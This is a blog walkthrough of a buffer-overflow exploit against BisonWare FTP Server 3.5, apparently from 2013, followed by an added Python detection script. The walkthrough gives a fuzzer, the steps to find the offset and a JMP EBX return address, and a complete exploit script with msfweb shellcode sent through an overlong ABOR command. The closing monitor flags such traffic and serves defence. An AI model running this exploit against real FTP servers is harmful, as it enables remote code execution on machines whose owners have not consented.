Friday, 19 April 2013

Buffer overflow: direct return exploit, BisonWare FTP Server V3.5


1. Open the BisonWare FTP Server application.

2. Test the connection with nc.

3. Create a fuzzer script in Python:

# Python 2 fuzzer: log in as anonymous, then send an oversized ABOR argument
import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*100        # 100 x 'A'; raise by 100 on each run until the server crashes
buffer+= "\r\n"
s.connect(('192.168.56.101',21))   # target host, FTP control port
print "Connecting...."
data = s.recv(1024)        # read the server banner
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')   # the overlong argument is what overflows the buffer
s.close()
print "Finished..."

4. Send the fuzzer, starting with *100, then *200, *300, and so on, until the target crashes.

5. The target crashes at *1600.


6. Open the target in OllyDbg to begin debugging.

7. Send the fuzzer again.

8. Look at EIP: it contains 41414141, the fuzzer's 'A' characters.

9. Create a cyclic pattern and insert it into the fuzzer script in place of the 'A's.

10. Open the target in OllyDbg and send the fuzzer again.

11. Copy the EIP register value and find its offset with pattern_offset.rb.



12. Edit the script so that the bytes landing in EIP are distinguishable:
   buffer+="BBBB"

13. Open the target in OllyDbg and send the fuzzer again.

14. EIP is now under control.



Unlike the previous target, here I'm not using the ESP register to place the payload; I'll use EBX instead. Why? Because EBX is overwritten with fuzzer data while ESP is not. Right-click EBX > Follow in Dump: there is enough space there to hold the payload.



15. Find a JMP EBX instruction and copy its address into the fuzzer script (little-endian byte order):
buffer+="\x0B\xFD\xA6\x7C"   # 0x7CA6FD0B, the address of JMP EBX

16. Set a breakpoint on the address of the JMP EBX.

17. Open the target in OllyDbg and send the fuzzer again.

18. EIP is successfully overwritten with the JMP EBX address.



19. Now generate the payload with msfweb: choose Windows Execute Command > calc.

20. Copy the generated payload into the fuzzer script:

# Python 2 exploit script: the same FTP login as the fuzzer, with the crash buffer
# replaced by filler + return address + NOP sled + shellcode
import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Windows Execute Command (calc) shellcode generated with msfweb
payload=("\xda\xdf\x33\xc9\xbf\xa0\xf7\x50\x16\xb1\x23\xd9\x74\x24\xf4\x5b"
"\x31\x7b\x17\x03\x7b\x17\x83\x63\xf3\xb2\xe3\x9f\x14\x76\x0c\x5f"
"\xe5\xfc\x49\x63\x6e\x7e\x57\xe3\x71\x90\xdc\x5c\x6a\xe5\xbc\x42"
"\x8b\x12\x0b\x09\xbf\x6f\x8d\xe3\xf1\xaf\x17\x57\x75\xef\x5c\xa0"
"\xb7\x3a\x91\xaf\xf5\x50\x5e\x94\xad\x82\x9b\x9f\xa8\x40\xfc\x7b"
"\x32\xbc\x65\x08\x38\x09\xe1\x51\x5d\x8c\x1e\xe6\x41\x05\xe1\x13"
"\xf0\x45\xc6\xe7\xc0\x47\xc6\x83\x4d\xe7\xf6\xce\x92\x90\xfa\x5b"
"\x52\x6d\x88\x2b\x4f\xc0\x05\xa3\x67\xf1\x13\xb8\xf8\xb5\x24\xbe"
"\xf8\x3e\x4c\x82\xa7\x71\x7b\x9a\x01\xfb\x7b\xd9\x6e\x80\x2b\xb5"
"\x10\xaf\x2e\x36\x85\xd7\x51\x32\x5b\xbf\x52\xa5\x07\x5e\xc1\x4a"
"\xc8")
# 1191 bytes of filler reach the saved return address, which is overwritten with the
# JMP EBX address (0x7CA6FD0B, little-endian); EBX points into the buffer, so execution
# slides down the 90-byte NOP sled into the shellcode
buffer = "\x41"*1191 + "\x0B\xFD\xA6\x7C" + "\x90"*90 + payload+'\r\n'
print "Connecting...."
s.connect(('192.168.56.101',21))
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."

21. Open the target without OllyDbg and send the exploit script.

22. Voila! The target has been exploited.
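From the defensive side, the traffic in this walkthrough has a distinctive shape on the FTP control channel: an ABOR argument far longer than any legitimate one, a long run of a single repeated byte, a NOP sled of 0x90 bytes and non-printable shellcode. The Python 3 monitor below is an added example, not part of the original post; its thresholds are assumptions, and its sample lines are constructed, with random-looking bytes standing in for shellcode.

```python
# Assumed policy thresholds (not from the post): RFC 959 fixes no maximum
# argument length, so these are tuning knobs for a control-channel monitor.
MAX_ARG_LEN = 512    # longer arguments are anomalous on an FTP control channel
MAX_BYTE_RUN = 32    # longest tolerated run of one repeated byte ("A"*N fuzzing)
MIN_NOP_SLED = 16    # run of 0x90 typical of a NOP sled ahead of shellcode


def longest_run(data):
    """Length of the longest run of a single repeated byte in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_ftp_command(raw):
    """Classify one raw, CRLF-terminated FTP command line (bytes)."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized argument (%d bytes)" % len(arg))
    if longest_run(arg) > MAX_BYTE_RUN:
        reasons.append("repeated-byte run of %d" % longest_run(arg))
    if b"\x90" * MIN_NOP_SLED in arg:
        reasons.append("NOP sled")
    if any(b < 0x20 or b > 0x7e for b in arg):
        reasons.append("non-printable bytes in argument")
    return {"verb": verb.decode("ascii", "replace").upper(),
            "arg_len": len(arg), "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample traffic: two benign commands, the post's "A"*1600 fuzz case,
# and an exploit-shaped line (1191 filler bytes, a 4-byte address, a 90-byte NOP
# sled, then a stand-in for shellcode; the stand-in is not a payload).
SAMPLES = [
    b"USER anonymous\r\n",
    b"ABOR\r\n",
    b"ABOR " + b"A" * 1600 + b"\r\n",
    b"ABOR " + b"A" * 1191 + b"\x0b\xfd\xa6\x7c" + b"\x90" * 90
    + bytes(range(0xa0, 0xc0)) + b"\r\n",
]


def triage(lines):
    """Return only the flagged commands, for a monitor or log pipeline."""
    return [r for r in (inspect_ftp_command(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for r in triage(SAMPLES):
        print(r["verb"], r["arg_len"], "; ".join(r["reasons"]))
```

On the constructed samples the two benign commands pass and both oversized ABOR lines are flagged, the exploit-shaped one on all four heuristics.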
